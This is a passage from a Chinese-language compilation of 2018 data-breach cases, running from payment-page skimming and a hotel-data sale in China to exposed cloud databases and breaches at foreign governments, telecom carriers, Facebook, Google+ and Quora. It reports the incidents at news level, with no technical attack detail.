该手机厂商证实:网上支付系统遭入侵。攻击者针对其中一个系统发动攻击并将恶意脚本注入支付页面代码中窃取用户付款时输入的信用卡信息,该恶意脚本能直接从消费者浏览器窗口中捕获完整的信用卡信息,包括信用卡号、到期日期和安全代码。

然而,该手机厂商认为通过所保存的信用卡、PayPal账户或者“经由PayPal通过信用卡”方法购买手机的消费者并未受影响。

(二) 北京某教育网站遭入侵,攻击者窃取7万余元

2018年4月,朱某从一个QQ群中得知可以利用网站漏洞进入服务器后台,从而得到管理员权限,修改余额并提现的方法。而且QQ群给出了具体的链接,几乎不需要多少专业知识,一学就会。

所以,朱某在网上注册成为北京某教育科技公司网上商城的会员,利用网站漏洞进入服务器后台,对余额进行修改,打开提现功能。从2016年11月至2017年3月这几个月间,他多次从商城提现,共窃取7万余元。

(三) 多家美容医院的客户信息被窃取

2018年7月,某警方侦破了一起盗窃、贩卖美容整形医院客户信息的案件,在美容整形医院网站上植入木马,侵入服务器,盗取客户信息,层层转手后贩卖给其他美容整形医院。

从美容整形医院客户数据泄露的源头来看:苏某与蒋某制作木马病毒后,假扮美容客户向医院客服咨询,将病毒链接藏匿在整形需求图片上,发送给工作人员。工作打开图片时,服务器被植入木马,客户隐私资料即被盗取。

潘在网上发出求购美容整形客户资料广告,苏某看到后一拍即合,将其发展为下线。“黑中介”杨某某作为批量信息买主,将信息加价后再转让给末端的市场人员,由他们通过电话、网络等方式对客户直接“引流”到愿意给他们提成的医院。为了规避法律风险,他们还安排专门的中间人负责收付款,以防止黑色资金被监控。

(四) 某知名酒店集团5亿条数据泄露

2018年8月,有网民发帖称售卖华住旗下所有酒店数据,该网友在帖子中称,所有数据脱库时间是8月14日,每部分数据都提供10000条测试数据。所有数据打包售卖8比特币,按照当天汇率约合37万人民币,随后又称,要减价至1比特币出售。

事故原因疑似华住公司程序员将数据库连接方式上传至github导致其泄露,目前还无法完全得知到细节。

售卖的数据分为三个部分:

1) 华住官网注册资料,包括姓名、手机号、邮箱、身份证号、登录密码等,共53G,大约1.23亿条记录;

2) 酒店入住登记身份信息,包括姓名、身份证号、家庭住址、生日、内部 ID 号,共22.3G,约1.3亿人身份证信息;

3) 酒店开房记录,包括内部id号,同房间关联号、姓名、卡号、手机号、邮箱、入住时间、离开时间、酒店 id 号、房间号、消费金额等,共66.2G,约2.4亿条记录。

8月底,暗网上出现了某知名集团旗下多个连锁酒店客户信息数据的交易行为,数据标价8个比特币,约等于人民币35万人民币,数据泄露涉及到1.3亿人的个人信息及开房记录。9月19日消息,窃取华住旗下酒店数据信息嫌疑人已经被上海警方抓获。

(五) “XX驿站”一千万条快递数据被非法窃取

2018年9月,某省公安厅获悉破获1个非法获取公民信息团伙,抓获犯罪嫌疑人21名。而被非法窃取的信息,经警方查实均系快递数据,来源于各大高校的大学生的快递信息。这些信息包含有单号、姓名、手机号、快递公司名称等。这类信息较为敏感,且数据的准确率极高。

警方通报,该案中,犯罪团伙并非采取以往的直接网络攻击盗取模式,而是对安装在物流网点手持终端(俗称巴枪)中的“XX驿站”APP进行破解后,植入控件程序。通过相关省份“XX驿站”服务商进行推广安装后,直接通过数据回传获得数据。

截至破案,遭非法窃取的快递数据超过1000万条

(六) 某知名酒店数据库遭入侵,5亿顾客信息或泄露

2018年11月30日,某国际酒店集团(Marriott International)宣布,旗下某酒店(Starwood Hotel)的一个顾客预订数据库被黑客入侵,可能有约5亿顾客的数据泄露。这些可能被泄露的信息包括顾客的姓名、通信地址、电话号码、电子邮箱、护照号码、喜达屋VIP客户信息、出生日期、性别和其他一些个人信息。对于部分客户,可能被泄露的信息还包括支付卡号码和有效日期,但这些数据是加密的。

某知名酒店表示,调查结果显示,有一未授权方复制并加密了这些数据。而且,自2014年就开始了对其网络进行未授权访问。

国外各行业信息泄露案例
一、 IT信息企业
(一) 因AWS存储桶配置不当引起的信息泄露:

1.上万印度板球球员个人信息泄露

2018年5月,Kromtech安全中心的研究人员再次发现了两个因配置错误而在线暴露的Amazon S3存储桶。从数据的内容来看,它们似乎归属于印度板球管理委员会(Board of Control for Cricket in India,BCCI)。

暴露的S3存储桶包含有大量的敏感数据,涉及从2015年至今向BCCI提交赛季参赛申请的约1.5万~2万印度人。泄漏的信息包括:注册过球员的登记表、选票、银行单据等扫描件及其亲属的姓名、出生日期、出生地、永久地址、电子邮箱地址、手机号码/固定号码、医疗记录、出生证明号码、护照号码、SSC证书号码、PAN卡号码及各种扫描件等。

2.本田汽车泄露敏感数据

2018年5月30日,Kromtech安全中心再次披露了本田汽车公司(HONDA)在印度的子公司——本田印度(HondaIndia)因不安全AWS S3存储桶泄露了超过5万名客户的个人详细信息。

由于公司意外的将超过5万名HondaCONNECT移动应用程序用户的个人详细信息存储在了两个可公开访问的Amazon S3存储桶中,这使得黑客窃取这些数据成为了可能。Kromtech安全中心的研究人员Bob Diachenko发现,能够被公开访问的信息包括用户及其可信联系人的姓名、电话号码、密码、性别和电子邮箱地址,以及有关他们汽车的信息,包括VIN、Connect ID等。

3.环球唱片被爆泄露敏感数据

2018年5月30日,Kromtech安全中心披露了成立于1912年的全球音乐巨头——环球唱片(UniversalMusic Group,UMG)因为受到其承包商的牵连,暴露了自己的内部FTP凭证、数据库跟密码和AWS配置详细信息,包括访问密钥和密码。

在与环球唱片取得联系后,该公司迅速进行了回应并解决了问题。

4.S3存储桶配置错误,暴露52.7万美国选民个人信息

2018年10月,UpGuard网络风险团队透露,一个归属于美国茶党爱国者公民基金(Tea PartyPatriots Citizens Fund,TPPCF)的亚马逊S3存储桶因为一个配置错误,意外暴露了包括全名和电话号码在内的52.7万选民的个人敏感数据。暴露的数据中还包括战略文件、呼叫源文件、营销资产和其他一些文件,这些文件揭示了TPPCF将美国选民在政治上动员起来的集中努力,这一努力最终帮助唐纳德?特朗普(Donald Trump)赢得了美国总统大选。

5.销售背锅!AWS官方人员导致GoDaddy数据泄漏

2018年8月,UpGuard网络风险小组近日发现了重大的数据泄露,涉及的文件似乎描述了在亚马逊AWS云上运行的GoDaddy基础设施,并采取了保护措施,防止将来有人利用该信息。泄露的这些文件放在公众可访问的亚马逊S3存储桶中,包括成千上万个系统的基本配置信息以及在亚马逊AWS上运行那些系统的定价选项,包括不同情况下给予的折扣。泄露的配置信息包括主机名、操作系统、“工作负载”(系统干什么用的)、AWS区域、内存和CPU规格等更多信息。实际上,这些数据直接泄露了一个规模非常大的AWS云基础设施部署环境,各个系统有41个列以及汇总和建模数据,分成总计、平均值及其他计算字段。还似乎包括GoDaddy从亚马逊AWS获得的折扣。

6.美国软件公司AgentRun意外泄露众多保险公司客户个人敏感信息

2018年5月,据外媒ZDNet报道,美国软件公司AgentRun在最近意外暴露了成千上万保单持有人的个人敏感信息,而究其原因是因为一个未加密的Amazon S3存储桶。

ZDNet指出,不安全的存储桶没有使用密码保护,任何人都可以对其进行访问。该Amazon S3存储桶包含了大量的缓存数据,涉及数千名不同保险公司客户的个人敏感信息,包括类似Cigna和SafeCo Insurance这样的大型保险公司的客户,遭泄露的信息可能包括保险单文件、健康和医疗信息、各种证件的扫描件以及一些财务数据。

在整个数据泄露持续的一小时中,可被公众访问的数据包括:保单文件包含详细的保单持有人个人信息,如姓名、电子邮箱地址、出生日期和电话号码。在某些情况下,一些文件还显示了收入范围、种族和婚姻状况,甚至还附上了空白的银行支票。对于扫描件而言,涉及到各种证件,如社会安全卡片、医疗卡、驾驶执照、选民证和军人证件;医疗记录文件则包含了可以确定保单持有人医疗状况的各种信息,包括个人的处方、剂量和费用。

(二) 澳大利亚16岁高中生数次入侵苹果服务器,下载90G文件

2018年8月,澳大利亚一名16岁高中生曾通过家中电脑成功入侵苹果服务器,在随后的一年时间里,他又数次入侵,下载了约90GB的重要文件,并访问过用户账号。

据悉,该少年在黑客界颇为有名。在发动攻击时,他使用了VPN和其他工具来避免被追踪。但百密一疏,该少年使用的MacBook笔记本电脑的序列号被苹果服务器所记录。

(三) 德国托管服务商DomainFactory大量客户数据遭外泄

2018年7月,DomainFactory公司在公告中指出,一名匿名黑客在DomainFactory的技术支持论坛上发帖称,他已经成功侵入了DomainFactory的客户数据库,并分享了几名DomainFactory客户的内部数据作为证据。发现这篇贴子后,该公司立即对其论坛进行了离线处理并展开了调查。调查结果显示,黑客的说法并非虚构。

DomainFactory最终确认了这一泄露事件,并公布了能够被黑客所访问的数据类型,同时向客户发出了更改密码建议。泄露的数据包括:客户名称、公司名称、客户账户ID、实际住址、电子邮件地址、电话号码、DomainFactory手机密码、出生日期、银行名称及账号等。

(四) 芬兰某公共服务网站数据泄露,超过13万芬兰公民受影响

2018年4月,据芬兰媒体Svenska Yle的报道,芬兰通信管理局(FICORA)于2018年4月6日通过自己的网站向所有芬兰公民发出警告称,一个由赫尔辛基新企业中心(“Helsingin Uusyrityskeskus”)负责维护的网站(liiketoimintasuunnitelma[.]com)在本周二遭遇了匿名黑客的攻击,大约有13万用户的账户用户名和密码被窃取,同时被窃取的还包括其他一些机密信息。从受害者数量来看,这将是该国有史以来发生的第三大数据泄露事件。

FICORA表示,该网站并没有对存储的任何信息进行加密,无论是用户名还是密码都采用明文形式进行储存,这使得网络犯罪分子更容易利用它们。由于用户名和密码是以明文形式泄露的,因此赫尔辛基新企业中心董事会主席JarmoHy?kyvaara建议,如果有用户在其他信息系统或网络服务使用了相同用户名和密码,应该立即对这些密码进行修改。而一旦Liiketoimintasuunnitelma网站重新恢复上线,还应该立即对该网站的账户密码进行修改。

(五) 联想的一台笔记本失窃了:它拥有成千上万名员工的姓名、月薪、银行账号

2018年12月,联想公司通知亚太区员工:一台存储有众多员工未加密数据的办公笔记本失窃!里面有成千上万名员工的工资单信息,包括亚太区员工的姓名、月薪和银行账号。

根据外媒披露,新加坡一名联想员工由公司发放的一台笔记本电脑失窃;要命的是,里面有亚太区成千上万员工的一大堆未经加密的工资单数据。

关于这次重大事故的细节是联想工作人员告诉称,他们对这个严重的错误感到困惑不解。联想已向员工发去了道歉信,承认这个重大的安全问题。

(六) 数千台Etcd服务器可任意权限访问,暴露750MB密码和密钥

2018年3月,据外媒报道,安全研究人员 Giovanni Collazo 通过 Shodan 搜索引擎发现近 2300 台安装了“etcd”组件的服务器暴露在互联网上,利用一些简单脚本即可从中获取登录凭证。目前Collazo 经过测试已经成功地从这些服务器上检索到了来自 1,485 个 IP 、约 750 MB 的数据,其中包括 8,781 个密码、650 AWS 访问密钥、23 个密钥和 8 个私钥。

虽然 Collazo 并没有测试这些凭证,但其中一些被推测是有效的,有可能会被攻击者用来侵入系统。此外,根据 Collazo 的说法,任何人只需几分钟时间就可以获得数百个可用于窃取数据或执行勒索软件攻击的数据库证书列表。

(七) 英国电商软件Fashion Nexus爆漏洞,多个品牌网站140万购物者隐私泄露

2018年8月,许多在英国服饰和配饰在线购物网站上消费的购物者发现他们的个人信息已经被确认遭到了泄露。此次数据泄露事件涉及多个英国时尚品牌,而导致时间发生的根源来自于他们共同的IT服务提供商Fashion Nexus。

由于Fashion Nexus及其姊妹公司WhiteRoom Solutions在安全管理方面的问题,导致一台服务器能够被公开访问。安全研究员TaylorRalston指出,在这台服务器上包含有一个共享数据库,其中涉及众多在线购物网站消费者的个人详细信息。总的来说,在线暴露的信息包含了大约140万消费者的个人信息,包括md5哈希密码、密码、Salt值、姓名、电子邮件地址、电话号码和其他一些数据。值得庆幸的是,并不涉及明支付卡信息。

(八) 云泄露最前线:

1.“不设防”的MongoDB暴露6600万条数据

2018年12月,安全研究人员发现,超过6600万数据在一个没有保护的数据库中,只要知道网址任何人都可以访问,而这些数据似乎来自LinkedIn个人资料。数据缓存包括可识别用户的个人详细信息,可帮助攻击者创建难以识别的网络钓鱼攻击。

根据Hacken网络风险研究总监BobDiachenko的说法,这些数据通过MongoDB公开了这个问题,无需身份验证即可进行访问。这66,147,856条特别的记录包含全名,个人或企业电子邮件地址,用户的位置详细信息技能,电话号码和工作经历,甚至还有个人LinkedIn个人资料的链接。

目前研究人员无法确定该数据库的所有者,但该数据库现在已不再在线,但并不排除它再次出现在网络上的可能性。

2.Adapt.io 123GB数据可公开访问

2018年11月5日,Hacken公司的安全专家发现了一个可公开访问且没有设置密码的MongoDB数据库,其大小为123GB,包含9,376,173条个人信息记录。泄露的信息包括:公司名、公司介绍、姓名、头衔/级别/职位、行业、公司规模、公司收入、电话号码、公司吸纳有联系人、电子邮件等。

经过仔细审查之后,Hacken公司的安全专家得出结论,这个数据库来自一个名为“Adapt.io”的商业服务网站。根据其网站的描述:“Adapt提供了数以百万计的商业联系方式。Adapt的免费工具可帮助您通过电子邮件、电话和众多联系人来丰富您在任何网站上的商业信息。”

3.FIESP近两亿条记录泄露

11月12日,Hacken公司的安全专家在使用Binaryedge.io平台审核可公开访问的Elasticsearch数据库的搜索结果时,发现了似乎是由巴西圣保罗州工业联合会(FIESP)编制的个人信息记录。FIESP隶属于巴西国家产业联合会,包括133个商业协会,涵盖13万个行业,这些行业占巴西国内生产总值(GDP)的42%。

存储在可公开访问的Elasticsearch数据库中的记录,总计数为180,104,892条,其中至少有3个数据集(FIESP、celurares和externo)包含巴西公民的姓名、个人身份证号码、纳税人登记证明、性别、出生日期、完整地址、电子邮箱地址、电话号码等个人信息。

Hacken公司的安全专家表示,他们在向FIESP发出通知后并没有收到任何回复。该数据库最终是在该公司的巴西粉丝Paulo Brito通过电话与FIESP取得联系之后,才得到离线处理的。

二、 政府机构
(一) 法国外交部称紧急联络人信息数据库遭黑客入侵

2018年12月,法国外交和欧洲事务部发表了一份声明,宣称其计算机系统遭黑客入侵,访问并保存了紧急联络人信息的数据库,导致众多个人信息被泄露。据悉,大概54万份个人档案信息在事件中被窃,其中包含姓名、电话号码和电子邮件地址等信息。

目前,这一安全漏洞已得到修复。该部还在事件发生72小时内联系了法国数据监管机构CNIL。

2010年,法国外交和欧洲事务部就创建了一项名为“阿丽亚娜”(Ariane)的紧急服务——如果你打算前往不安全的国家时,可以在“阿丽亚娜”平台上进行登记,将这一信息告诉外交和欧洲事务部。这样一来,你就会收到安全简报,如果当地有危机发生,法国外交和欧洲事务部将会联系你,而且会保存紧急联络人信息,以防你在出境时遇到了意外情况。

此次被泄露就是“阿丽亚娜”平台,保存紧急联络人信息的数据库。

(二) 美国监狱电话监控供应商Securus被黑,大量数据遭窃取

2018年5月,一位匿名黑客从Securus窃取了大量数据,Securus是一家为监狱囚犯提供电话服务的公司,并且为执法部门提供追踪电话使用服务。窃取的数据包括电子表格,上面的标志显示文档属于警方,里面有2800个用户名,还有邮件地址、手机号、密码、安全提示问题,数据最早可以追溯到2011年。

(三) 美国政府网站HealthCare.gov被黑,7.5万人敏感信息泄露

2018年10月,负责HealthCare.gov网站的机构称他们在一个与HealthCare.gov交互的政府计算机系统中发现了一起黑客攻击行为,导致大约7.5万人的敏感个人数据遭到泄露。

其设计由美国联邦医疗保险暨补助服务中心(CMS)监督,并由多个联邦承包商建立。该网站投资高达8亿美金。CMS的管理在声明中说,“我们正努力尽快查明可能受到影响的个人,以便我们能够通知他们,并提供信贷保护等资源。”

(四) 印度国家生物特征库Aadhaar疑似数据泄漏

2018年3月据相关媒体报道,法国一名安全研究员Baptiste Robert通过推文宣称,他在印度政府和非政府机构网站上共找到了2万张Aadhaar卡的电子图片(PDF或jpeg格式),而整个过程只花了约3个小时的时间。

Aadhaar目前拥有着世界上最大的生物识别数据库,已经收集了超过十亿印度公民的虹膜扫描和指纹。随后,印度唯一身份认证管理局(Unique Identification Authority of India, UIDAI)却重申Aadhaar“依然安全可靠”,并将安全漏洞的报告驳回,称其为“不负责任”和“远离真相”

(五) 印度某政府网站意外泄露大量公民敏感信息,目前仍未修复

2018年4月,安全研究员SrinivasKodali报告了一起数据泄露事件,受影响的是一个隶属印度安得拉邦的政府网站。根据Kodali的描述,遭泄露的数据包括Aadhaar号码、银行分行、IFSC代码和帐号、姓名、地址、身份证号码、手机号码、配给卡号码、职业、宗教信仰和种姓信息。

虽然印度政府和UIDAI(印度唯一身份认证中心)曾辩称仅是Aadhaar卡号,并不包含印度公民的所有个人信息。但在印度,Aadhaar号码与其他的个人信息相关联是一个不争的事实。Kodali强调,不法黑客具备生成这种关联列表的能力,这些信息完全可以被用来锁定某个单一的个人。另外,这个数据库是公开可用的,并且允许任何人在未经授权的情况下访问。

(六) 印度全民个人信息遭泄漏,售价不足6英镑!

2018年1月根据印度《论坛报》(Tribune)进行的调查显示,超过10亿印度公民的个人资料(包括指纹和虹膜等生物识别信息)正在在线出售,售价不足6英镑。

这些数据是存储在世界上最大的国营生物识别数据库——Aadhaar中。同时在线出售的还有可用于生成虚假Aadhaar卡的软件。此前,印度政府认为,Aadhaar项目将帮助把大量的印度公民纳入数字经济之中,会对印度的社会发展产生广泛的意义,下令强制该国公民必须在2017年12月31日之前将Aadhaar号码与自己的银行账户、手机号码、保险账户、永久性账号卡(PAN Card)以及其他服务绑定起来。但有批评者认为,该系统的好处被夸大了,并正在面临不断增长的安全风险。

三、 电信运营商
(一) T-Mobile又泄露超过200万客户数据

2018年8月,T-Mobile公司披露,在黑客获得对其系统的访问权后,窃取了“一小部分”客户的个人信息,可能包括个人信息,如姓名,帐单邮政编码,电话号码,电子邮件地址,帐号和帐户类型。其代表表示,今次数据泄露违规行为影响其7700万客户中约3%的客户,约占230万人。

其实,在2016年6月份时已经发生了一起数据泄露事件,T-Mobile的一名员工在T-Mobile捷克共和国窃取了超过150万的客户记录,以便出售以获取利润,最终使得捷克共和国警方介入调查。但该公司表示,数据泄露是被其中一名员工窃取,该员工在尝试销售数据时被捕获。

(二) Voxox短信数据库遭泄,暴露短信认证安全问题

一家位于加州圣地亚哥的通信公司Voxox,由于服务器没有密码保护,导致任何知道该去哪儿窥视的人都能看到近乎实时的短信数据流。驻柏林的安全研究员塞巴斯蒂安·考尔(SébastienKaul)发现,Voxox的一个二级域名指向了这个无遮无拦的服务器。更糟糕的是,这个在亚马逊Elasticsearch上运行的数据库还配置了Kibana前端,使得其中的数据易于读取、浏览以及按照姓名、手机号码和短信内容进行检索。

此安全失误导致一个庞大的数据库遭到泄露,该数据库中的数千万条短信中包含了密码重置链接、双因素认证代码以及快递通知等等。

在TechCrunch发出问询后,Voxox已将数据库脱机。在关闭时,该数据库上似乎拥有年初以来的逾2600万条短信。不过,我们可以从数据库的可视化前端查看到平台每分钟处理的短信数量,它表明实际的数字可能更高。

(三) 电信巨头加拿大贝尔公司数据又被泄,近10万用户受影响

2018年1月,加拿大最大的电信公司加拿大贝尔公司 (Bell Canada) 开始通知10万名消费者称他们的个人数据已遭攻陷。贝尔公司指出,消费者的姓名和邮件地址遭“非法访问”,但加拿大多家新闻报告称黑客可能也获得了电话号码、用户名和账户号。然而,贝尔公司表示尚未有证据表明信用卡或银行信息遭攻陷。

这是贝尔公司第二次遭遇数据泄露事件。2016年5月,该公司证实称约190万个活跃邮件地址和约1700个姓名和活跃电话号码遭黑客访问。目前尚不清楚这两起事件之间是否存在关联。

(四) 泰国最大的4G移动运营商TrueMoveH遭遇数据泄露

2018年4月,泰国最大的4G移动运营商TrueMove H遭遇数据泄露,AWS上46000人的数据被直接曝光在网上,包括驾驶执照和护照,以及身份证件的扫描件等。

安全研究人员Niall Merrigan发现数据泄露问题之后,试图将此问题告知TrueMove H,但运营商没有回应。Merrigan透露,该AWS存储桶包含总计32GB的46,000条记录。

在媒体曝光之后,TrueMove H发布了一份声明,澄清数据泄漏影响了其子公司I True Mart。一位法律专家表示,TrueMove H可能面临数据泄露的惩罚,而安全专家呼吁电信运营商开始引入更完善的数据保护措施。

(五) 俄罗斯电信公司意外暴露数千名富豪客户个人信息

2018年1月,据路透社(Reuters)报道,数千名在一家区域互联网服务提供商完成注册的莫斯科富人可能已经暴露了他们的个人信息,这其中就包括他们的姓名、家庭住址和手机号码等。

报道称,这起备受关注的数据泄露事件的所有受害者全都是俄罗斯互联网提供商AkadoTelecom的客户,这是一家由亿万富翁维克托?维克塞尔伯格(ViktorVekselberg)拥有的大型电信网络。目前,该公司表示已对此次事件展开调查。

(六) 黑进TalkTalk公司的两黑客分别被判1年、10个月

2018年11月,两名来自英格兰斯塔福德郡塔姆沃思的男子因参与2015年TalkTalk公司黑客攻击事件而被判入狱。据悉,21岁的康纳·奥尔索普(Connor Allsopp)与23岁的马修·汉利(Matthew Hanley)两人已对黑客指控认罪。奥尔索普被判处8月的监禁,而汉利被判处12月的监禁。

2015年10月,TalkTalk电信集团公司公开披露,其服务器受“持续网络攻击”,而且,黑客窃取了该公司客户的姓名、住址、出生日期、电子邮箱地址及电话号码信息,且窃取了1.5万用户的财务数据。攻击者还曾试图勒索电信公司TalkTalk首席执行官狄多·哈丁(DidoHarding)。

(七) 美国电信巨头Comcast爆漏洞,暴露2650万用户个人信息

2018年8月,研究员发现Comcast Xfinity无意中暴露了超过2650万名用户的家庭住址和社会安全号码。隶属于这家全美第二大互联网服务提供商的在线客户门户网站上被发现存在两个此前未被报告的漏洞,这使得即使是不具备太多专业技能的黑客也可以很容易地访问这些敏感信息。

在BuzzFeed News向Comcast报告了这项调查结果之后,该公司对漏洞进行了修复。Comcast发言人David McGuire告诉BuzzFeed News:“我们迅速对这些问题进行了调查,在几个小时内我们修复了这两个漏洞,消除了研究人员所描述的潜在威胁。我们非常重视用户的安全,目前没有证据表明漏洞曾被用来攻击Comcast的客户。”

(八) 瑞士电信证实80万数据被盗,涉全国1/10公民信息

2018年2月,一个身份不明的用户访问了Swisscom 客户的姓名、地址、电话号码和出生日期等信息,目前Swisscom认为该用户是通过其销售合作伙伴获取数据的。

据 IBTimes 报道,瑞士电信 (Swisscom) 于 2 月 7 日承认其用户数据在去年年底遭到破坏,约80 万名客户(占瑞士总人口的 10 %)的个人信息遭到泄露。不过 Swisscom 承诺此次事件不会涉及用户任何敏感信息(比如密码、会话或支付数据)。此外,为了更好地保护第三方公司对个人数据的访问,Swisscom 做出了一些重要改变,其中包括:相关合作伙伴公司的访问权限已被立即封锁;在销售合作伙伴账户中引入双因素认证,同时削减运行大容量查询的能力;第三方账户上的任何异常活动都会触发警报并阻止访问。

(九) 西班牙电信Telefónica存漏洞,可暴露数百万用户的完整个人数据

2018年7月,据El Espanol报道,西班牙电信(Telefónica)在16日凌晨被西班牙消费者协会FACUA发现存在一个安全漏洞。透过这个漏洞能够访问数百万用户的完整个人数据。暴露给黑客的信息包括固定电话和移动电话用户的全名、国家身份证号码、家庭住址、银行记录和通话记录,而所有这些数据都可以以电子表格的形式下载。

Telefónica表示,他们在接到这一通知后,立即对该漏洞进行了修复。另外,也向有关当局进行了报告。而El Espanol称,因为该漏洞而可能遭到泄露的数据包括用户的个人身份信息和支付卡信息,并且漏洞极其易于利用,即使是不具备高技术水平的入侵者也能够访问对它们进行访问。

有专家表示,“Telefónica作为全球十大电信公司之一,收入超过530亿美元。令人惊讶的是,Telefónica用户的数据居然可以轻松下载为未加密的电子表格。”

(十) 印度国有运营商BSNL内网遭入侵,4.7万员工个人信息随意浏览

2018年3月,根据《印度经济时报(The Economic Times,ET)》及多家国外媒体的报道,法国安全研究人Robert Baptiste声称已获得了印度国有电信运营商Bharat Sanchar NigamLimited(BSNL)内部网络数据库的访问权,该数据库包含超过4.7万名员工的详细信息。

早前,Baptiste还与ET分享了一个包含BSNL离职和现任员工姓名、职称、密码、手机号码、出生日期、退休日期、电子邮件地址等详细信息的数据库样本。ET随后从数据库中调取了六名员工的个人信息,并通过电话验证了他们的身份属实。

Baptiste已通过Twitter与BSNL进行了接触,并通知了他们关于这个问题。该公司的IT团队与他进行了讨论,最终确认了问题的严重性。目前,大部分漏洞已经被修复,而一些网站也已经被删除。

据Baptiste反馈,这个问题最初是由印度安全研究员Sai KrishnaKothapalli在两年前报道的,但在当时并没有得到BSNL的答复。

四、 互联网
(十一) Facebook披露严重漏洞:黑客可控制5000万用户账号

2018年9月,Facebook周五宣布,该公司发现了一个安全漏洞,黑客可利用这个漏洞来获取信息,而这些信息原本可令黑客控制约5000万个用户账号。在披露这一消息之前,Facebook股价已经下跌了1.5%左右,消息传出后进一步走低,到收盘时下跌2.59%报164.46美元,盘中一度触及162.56美元的低点。

Facebook发布博文称,该公司的工程团队发现,黑客在Facebook的“View As”功能中找到了一个代码漏洞。Facebook之所以能发现这个漏洞,是因为该公司在9月16日注意到用户活动大增。Facebook表示将暂时关闭View As功能,将对其安全性进行审查。Facebook表示已通知美国联邦调查局(FBI)和爱尔兰数据保护委员会(Irish Data ProtectionCommission)等执法机关,目的是解决任何有关一般数据保护条例(GDPR)的问题。

(十二) Facebook严重漏洞调查:2900万用户数据失窃,易受针对性钓鱼影响

2018年10月13日,Facebook周五宣布,网络攻击者利用一个自动程序窃取了Facebook约2900万个账户的数据。该公司表示,将在未来几天向受影响用户发送信息,告知他们在攻击中被访问了哪些类型的信息。

据介绍,攻击者从1400万用户中获取了个人资料的详细信息,如出生日期、雇主、教育历史、宗教信仰、使用的设备类型、跟踪的页面以及最近的搜索和位置登记。对于其他1500万用户,入侵仅限于姓名和联系方式。此外,攻击者还可以看到约40万用户的帖子和好友列表。

根据今年5月欧盟颁布的“通用数据保护条例”,Facebook必须在得知妥协后72小时内发出通知。Facebook的主要欧盟数据监管机构爱尔兰数据保护专员上周对这起泄密事件展开了调查。包括美国康涅狄格州和纽约州在内的其他司法管辖区的有关部门也在调查这起袭击事件。

(十三) Facebook隐私泄露人数上升至8700万,用户主要集中在美国

2018年4月,Facebook首席技术官Mike Schroepfer发表的一则博客文章称,我们认为Facebook上约有8700万用户,大约81.6%是美国用户,或许受到Cambridge Analytica获取数据的影响。此前,受到此次事件影响的Facebook用户数预计在5000万左右,8700万人的数字较之前的预估有了大幅提升。

由Cambridge Analytica大数据分析公司所引发的Facebook用户数据大面积泄漏事件目前仍在发酵,尽管Facebook方面已经公布一系列措施已改善用户数据安全管理,但关于此事件的调查仍在进行中。

(十四) Facebook又泄露700万用户个人照片,可能面临16亿美元罚款

2018年12月,据外媒报道,社交网络巨头Facebook可能面临超过16亿美元的罚款,因为它刚刚在一次安全入侵事件中暴露了近700万用户的个人照片。爱尔兰数据保护委员会(IDPC)表示,它已对这个安全入侵事件是否遵守了一般数据保护法(GDPR)的相关规定展开了调查。其中有些被曝光的照片是用户从未在该社交网络上分享过的照片。

电子隐私信息中心(Electronic PrivacyInformation Center)执行董事马克-罗滕贝格(MarcRotenberg)称,这一安全入侵事件可能会让Facebook违反它在2011年与美国贸易监管机构签署的一项协议,该协议要求Facebook改善其隐私做法,否则将面临罚款。

(十五) 谷歌关闭个人版Google+:因50万用户数据遭到曝露

2018年10月9日,据报道,谷歌周一在公司博客中宣布,公司将关闭旗下社交网站Google+的消费者版本。此前该公司宣布,Google+在长达两年多时间里存在一个软件漏洞,导致最多50万名用户的数据可能曝露给了外部开发者。

谷歌称,公司今年3月就已发现这个漏洞并推出补丁加以修复,并表示没有证据表明用户数据被滥用,也并无证据表明任何开发者明知或利用了这个漏洞。

受此影响,谷歌母公司Alphabet股价下跌1.02%,报收于1155.92美元。

(十六) Google+再曝严重漏洞影响5250万用户,将被提前关闭

2018年12月,谷歌表示,在Google+ People API 中找到另外一个严重的安全漏洞,可导致开发者窃取5250万名用户的个人信息,包括姓名、邮件地址、职业和年龄。将导致谷歌将在2019年四月,即比计划时间提前四个月关闭该社交服务。

这个易受攻击的 API 被称为“People:get”,旨在让开发人员请求和用户资料相关的基本信息。然而,谷歌在11月发布的软件更新导致 Google+ People API 中出现 bug,导致即使在用户资料被设置为“非公开”的情况下,app 仍可查看用户信息。

(十七) 供应商产品感染恶意软件,致使Ticketmaster英国网站客户信息泄露

2018年6月,票务销售公司Ticketmaster的英国网站宣布,他们在Ticketmaster网站相关产品中发现了恶意软件,部分客户的个人信息或付款信息或许已因此遭到泄露。

Ticketmaster是一家大型票务销售公司,总部位于美国加利福尼亚州,运营点遍布全球,主营票务类型为娱乐、体育。根据其官方公告,6月23日Ticketmaster UK在由Ticketmaster的外部第三方供应商Inbenta Technologies托管的客户支持产品中发现了恶意软件。发现恶意软件后,他们禁用了所有Ticketmaster网站上的Inbenta产品。尽管如此,部分客户的个人信息已经因此泄露,可能暴露的个人信息包括:姓名,地址,电子邮件地址,电话号码,付款详情和Ticketmaster登录详细信息。

(十八) 黑客售8万个Facebook用户信息:每个账号售价10美分

2018年11月,据BBC报道,黑客称其已经窃取和公布了至少8.1万个Facebook用户账号的私人信息,并以每个账号10美分的价格出售其所盗取的数据。

BBC获悉,在个人细节信息被盗的用户中,很多都是乌克兰和俄罗斯用户,但也有一些来自英国、美国、巴西及其他国家。黑客以每个账号10美分的价格出售其所盗取的数据,但他们此前发布的广告现已下线。

此次黑客事件最早是在今年9月曝光的,当时一名昵称为“FBSaler”的用户在一个英语在线论坛上发布帖子称:“我们出售Facebook用户的个人信息。我们的数据库里有1.2亿个账号。”随后,网络安全公司Digital Shadows代表BBC进行了调查,并确认被在线发布的8.1万多个账号中包含了用户私人信息。

(十九) 美版“知乎”Quora遭黑客入侵:1亿用户数据裸奔

2018年12月,据报道,美国社交问答Quora网站称,该公司已经聘请“顶尖数字法证和安全公司”,并且已经上报执法部门。他们上周五发现其用户数据遭到身份不明的第三方非法获取。亚当在博客中表示,大约1亿Quora用户可能有大量信息遭到泄露,包括:帐号信息、公开内容和活动,以及非公开内容和活动。

Quora表示,匿名提交问题和答案的用户不会受此影响,因为Quora并没有存储任何与匿名用户有关的信息。

(二十) 全球最大同性社交软件Grindr存漏洞,可泄露用户信息及位置

2018年3月,美国NBC的一份报道称,一款名为Grindr的交友应用程序存在两个安全问题,它可以暴露超过300万用户的信息,包括那些选择不共享这些信息的人的位置数据。

